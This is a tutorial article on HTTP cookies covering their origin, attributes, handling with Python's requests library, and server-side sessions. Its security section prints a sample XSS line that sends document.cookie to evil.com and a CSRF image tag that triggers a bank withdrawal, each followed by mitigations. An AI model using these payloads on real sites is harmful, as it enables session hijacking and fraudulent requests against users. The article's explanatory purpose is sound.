Mastering Web Cookies: From Basics to Python Manipulation

This article explains the origin, purpose, and inner workings of HTTP cookies, details their attributes and security implications, demonstrates how to create, retrieve, and set cookies with Python's requests library, and compares cookies with server‑side sessions for robust web development.

MaGe Linux Operations

In a previous tutorial on a Youku bullet‑screen crawler we briefly mentioned cookies; this article provides a comprehensive overview of cookies (small data files) and related concepts.

1. Birth Background

HTTP is stateless, meaning the server cannot identify whether two requests come from the same browser. As the web evolved toward interactive applications, developers needed a way to remember user actions, leading to hidden fields and eventually to cookies.

Hidden field example: <input type="hidden" name="field_name" value="value">

In 1994, Lou Montulli at Netscape introduced cookies to store shopping‑cart history, and browsers gradually adopted the feature.

2. What Is a Cookie

A cookie is a small piece of text that the server sends to the client and that the browser stores locally. The browser includes the cookie in subsequent requests to the same site, allowing the server to track client state.

Cookies are mainly used for:

Session state management (e.g., login status, shopping cart, game scores).

Personalized settings (e.g., user preferences, themes).

Browser behavior tracking (e.g., analytics).

3. Cookie Principle

When a user logs in, the server validates the credentials and returns a Set-Cookie header in the response. The browser saves the cookie and sends it back in the Cookie header on later requests to a matching host and path.

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Thu, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly

Subsequent request example:

GET /sample_page.html HTTP/1.1
Host: www.example.com
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg

The server reads the cookie to identify the user, confirming that the user is logged in. Note that cookies are stored client‑side and can be modified, which poses security risks.
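The exchange above can be sketched with Python's standard http.cookies module. This is only an illustration: it parses a shortened form of the Set-Cookie value (Expires omitted) and rebuilds the Cookie header a browser would send back. The helper names parse_set_cookie and build_cookie_header are made up for this example.

```python
from http.cookies import SimpleCookie

# Shortened form of the Set-Cookie value from the response above.
SET_COOKIE = (
    "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; "
    "Path=/; Domain=.example.com; HttpOnly"
)


def parse_set_cookie(header_value):
    """Return (name, value, attributes) for a single Set-Cookie value."""
    jar = SimpleCookie()
    jar.load(header_value)
    name, morsel = next(iter(jar.items()))
    # Keep only the attributes that were actually present in the header.
    attributes = {key: val for key, val in morsel.items() if val}
    return name, morsel.value, attributes


def build_cookie_header(name, value):
    """Build the Cookie request header; attributes are never sent back."""
    return f"Cookie: {name}={value}"


name, value, attributes = parse_set_cookie(SET_COOKIE)
print(name, value, attributes)
print(build_cookie_header(name, value))
```

Only the name and value travel back to the server; Path, Domain, and HttpOnly stay in the browser and decide when and how the cookie is used.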

4. Cookie Attributes

A cookie is described by several fields. Name, Value, Domain, Path, Expires/Max-Age, HttpOnly, and Secure control its behavior, while Size is a derived figure shown by browser developer tools rather than an attribute the server sets.

1. Name & Value

The Name identifies the cookie; the server uses it to retrieve the corresponding Value.

2. Domain & Path

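Domain restricts which hosts the browser sends the cookie to. A cookie set for .baidu.com is also sent to subdomains such as tieba.baidu.com, whereas a cookie set for .tieba.baidu.com is not sent to other baidu.com hosts. Path limits the URL paths the cookie is sent to: a cookie with Path=/test is sent for /test and everything beneath it, such as /test/page.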
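The matching rules can be sketched in a few lines of Python. This is a simplified reading of the rules browsers apply: it ignores IP-address hosts and public-suffix checks, and the function names are hypothetical.

```python
def domain_matches(request_host, cookie_domain):
    """True if a cookie with this Domain would be sent to request_host."""
    host = request_host.lower()
    domain = cookie_domain.lower().lstrip(".")
    # Either the exact host, or a subdomain separated by a dot.
    return host == domain or host.endswith("." + domain)


def path_matches(request_path, cookie_path):
    """True if a cookie with this Path would be sent for request_path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # The prefix must end at a "/" boundary, so /test does not match /testing.
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


print(domain_matches("tieba.baidu.com", ".baidu.com"))
print(domain_matches("www.baidu.com", ".tieba.baidu.com"))
print(path_matches("/test/page", "/test"))
print(path_matches("/testing", "/test"))
```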

3. Expires/Max‑Age

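Defines the cookie's lifetime. Expires gives an absolute date and Max-Age gives a lifetime in seconds; if both are present, Max-Age takes precedence. If neither is set, the cookie is a session cookie and is discarded when the browser closes.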
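A minimal sketch of how a client could work out the expiry moment from these two attributes, using only the standard library. The function names expiry_time and is_expired are assumptions for this example, and the date string is illustrative.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime


def expiry_time(received_at, expires=None, max_age=None):
    """Return the expiry datetime, or None for a session cookie."""
    if max_age is not None:
        # Max-Age is a lifetime in seconds and wins over Expires.
        return received_at + timedelta(seconds=int(max_age))
    if expires is not None:
        # Expires is an absolute HTTP date such as "Thu, 15 Aug 2019 21:47:38 GMT".
        return parsedate_to_datetime(expires)
    return None


def is_expired(now, expiry):
    """Session cookies (expiry None) never expire by time alone."""
    return expiry is not None and now >= expiry


received = datetime(2019, 8, 1, tzinfo=timezone.utc)
print(expiry_time(received, max_age=3600))
print(expiry_time(received, expires="Thu, 15 Aug 2019 21:47:38 GMT"))
print(expiry_time(received))
```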

4. Size

Represents the total character count of the name and value (e.g., id=666 has size 5: two characters for the name plus three for the value).

5. HttpOnly

When set, the cookie is sent only in HTTP headers and cannot be read by scripts through document.cookie, which limits cookie theft via XSS attacks.

6. Secure

When set, the cookie is transmitted only over HTTPS.
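One way to use these two flags in practice is to check whether a Set-Cookie value carries them. The following is a rough sketch built on the standard http.cookies parser; missing_security_flags is a hypothetical helper, not part of any library.

```python
from http.cookies import SimpleCookie


def missing_security_flags(set_cookie_value):
    """Map each cookie name to the security flags it lacks."""
    jar = SimpleCookie()
    jar.load(set_cookie_value)
    missing = {}
    for name, morsel in jar.items():
        # A flag that was present parses as True; an absent one is an empty string.
        flags = [flag for flag in ("httponly", "secure") if not morsel[flag]]
        if flags:
            missing[name] = flags
    return missing


print(missing_security_flags("sid=abc; Path=/; HttpOnly"))
print(missing_security_flags("sid=abc; Path=/; Secure; HttpOnly"))
```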

5. Python Operations on Cookies

1. Generating Cookies

After successful authentication, the server can set a cookie in the response header; the browser stores it automatically.
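On the server side this step might look like the sketch below. It is framework-independent and makes several assumptions: the USERS dictionary stands in for a real credential store (which would hold hashed passwords), and the cookie name, lifetime, and the function login_headers are chosen for illustration only.

```python
import secrets
from http.cookies import SimpleCookie

# Hypothetical credential store; real applications compare hashed passwords.
USERS = {"alice": "s3cret"}


def login_headers(username, password):
    """Return (status, headers), adding Set-Cookie only on a successful login."""
    headers = [("Content-Type", "text/html")]
    if USERS.get(username) != password:
        return 401, headers
    cookie = SimpleCookie()
    # A random, unguessable value identifies this login.
    cookie["user_cookie"] = secrets.token_urlsafe(18)
    cookie["user_cookie"]["path"] = "/"
    cookie["user_cookie"]["max-age"] = 3600
    cookie["user_cookie"]["httponly"] = True
    cookie["user_cookie"]["secure"] = True
    headers.append(("Set-Cookie", cookie["user_cookie"].OutputString()))
    return 200, headers


status, headers = login_headers("alice", "s3cret")
print(status, headers)
```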

2. Retrieving Cookies

With the requests library, the cookies a server set on a response r are available as r.cookies (a RequestsCookieJar), and r.cookies.get_dict() returns them as a plain dictionary.
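A small sketch of reading cookies with requests follows. So that it runs without network access, it fills the jar of an empty Response by hand as a stand-in for `r = requests.get(url)`; the cookie names and values are illustrative, and describe_cookies is a hypothetical helper.

```python
import requests


def describe_cookies(response):
    """Return each cookie on a response as (name, value, domain, path)."""
    return [(c.name, c.value, c.domain, c.path) for c in response.cookies]


# Offline stand-in for `r = requests.get(url)`: the jar is filled by hand.
r = requests.Response()
r.cookies.set("user_cookie", "Rg3vHJZnehYLjVg7qi3bZjzg", domain=".example.com", path="/")
r.cookies.set("theme", "dark", domain=".example.com", path="/")

print(r.cookies.get_dict())   # all cookies as a plain dict
print(r.cookies["theme"])     # look up a single cookie by name
print(describe_cookies(r))    # iterate to see domain and path as well
```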

3. Setting Cookies

When crawling, you can copy the browser’s cookie string into a requests session to impersonate a logged‑in user.
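The copy-and-paste approach might be sketched as follows. The cookie string is a placeholder, the helper names are hypothetical, and the request is only prepared, not sent, so the outgoing Cookie header can be inspected offline.

```python
import requests


def parse_cookie_string(cookie_string):
    """Turn a browser-style 'a=1; b=2' string into a dict."""
    cookies = {}
    for pair in cookie_string.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def session_with_cookies(cookie_string):
    """Create a requests session preloaded with the given cookies."""
    session = requests.Session()
    session.cookies.update(parse_cookie_string(cookie_string))
    return session


# Placeholder value; in practice this is copied from the browser's developer tools.
BROWSER_COOKIE = "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; theme=dark"
session = session_with_cookies(BROWSER_COOKIE)

# Prepare (but do not send) a request to see the header that would go out.
prepared = session.prepare_request(requests.Request("GET", "https://www.example.com/"))
print(prepared.headers["Cookie"])
```

Cookies added this way carry no domain restriction, so the session sends them to every host it contacts. Use a session like this only for the site the cookies came from.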

6. Session

1. Birth Background

Because cookies are client‑side, visible, and modifiable, sessions were introduced to store user data securely on the server while using a cookie only for the session identifier.

2. What Is a Session

A session is a server‑side object identified by a session ID, which the server sends to the client as a cookie. The session persists until the user logs out or it times out.

Session workflow:

The first request creates a session and returns a session ID cookie.

Subsequent requests include the session ID, allowing the server to retrieve the stored data.

Sessions can be implemented via cookies or URL rewriting; the workflow above describes the cookie method, in which the session ID travels in a cookie rather than in the URL.
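The workflow above can be sketched as an in-memory session store. This is a toy model under stated assumptions: the 30-minute idle timeout, the dictionary layout, and the function names are invented for illustration, and a real server would use persistent or shared storage.

```python
import secrets
import time

SESSION_TTL = 1800  # assumed idle timeout in seconds (30 minutes)
_sessions = {}      # session ID -> {"data": dict, "last_seen": float}


def create_session(now=None):
    """First request: create a session and return the ID to send as a cookie."""
    session_id = secrets.token_urlsafe(32)
    _sessions[session_id] = {
        "data": {},
        "last_seen": time.time() if now is None else now,
    }
    return session_id


def get_session(session_id, now=None):
    """Later requests: look up the data for the ID from the cookie, or None."""
    now = time.time() if now is None else now
    entry = _sessions.get(session_id)
    if entry is None:
        return None
    if now - entry["last_seen"] > SESSION_TTL:
        # Timed out: forget the session so the ID can no longer be used.
        del _sessions[session_id]
        return None
    entry["last_seen"] = now
    return entry["data"]


def destroy_session(session_id):
    """Logout: remove the server-side data."""
    _sessions.pop(session_id, None)


sid = create_session(now=0)
get_session(sid, now=10)["user"] = "bob"
print(get_session(sid, now=20))
```

The client only ever holds the opaque ID; the user data itself stays on the server.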

7. Interview Scenarios

1. Cookie vs. Session

Both let the server keep state across otherwise stateless HTTP requests.

Cookies reside client-side, so they are easy to inspect and forge and are less secure.

Sessions reside server‑side, consuming server resources.

Session implementation can use cookies or URL rewriting.

2. Security Issues Caused by Cookies

Session hijacking and XSS: attackers steal cookies to impersonate users. Example exploit:

(new Image()).src = "http://evil.com/steal-cookie.php?cookie=" + document.cookie;

HttpOnly cookies mitigate this.

CSRF: malicious requests triggered by a logged‑in user’s cookie. Example:

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000">

Mitigations include hidden form fields that carry an anti-CSRF token, confirmation steps for sensitive actions, and short cookie lifetimes.
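The hidden-field mitigation can be sketched as a token that is bound to the user's session and checked on every state-changing request. This shows one common pattern, not the only one; SECRET_KEY, the field name csrf_token, and the function names are assumptions for this example.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret; a real deployment would load it from configuration.
SECRET_KEY = secrets.token_bytes(32)


def csrf_token_for(session_id):
    """Derive a token from the session ID that an attacker cannot compute."""
    return hmac.new(SECRET_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def hidden_field(session_id):
    """Render the hidden form field that carries the token."""
    return f'<input type="hidden" name="csrf_token" value="{csrf_token_for(session_id)}">'


def is_valid_csrf_token(session_id, submitted_token):
    """Compare in constant time; a forged request cannot supply the right token."""
    expected = csrf_token_for(session_id).encode("utf-8")
    return hmac.compare_digest(expected, submitted_token.encode("utf-8"))


token = csrf_token_for("session-123")
print(hidden_field("session-123"))
print(is_valid_csrf_token("session-123", token))
print(is_valid_csrf_token("session-123", "forged"))
```

A cross-site request such as the img example still carries the victim's cookie, but it cannot include the token, so the server can reject it.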

8. Summary

The article covered the fundamentals of cookies, their attributes, security considerations, how to manipulate them with Python’s requests library, and the relationship between cookies and server‑side sessions, providing a solid foundation for web crawling and web development.
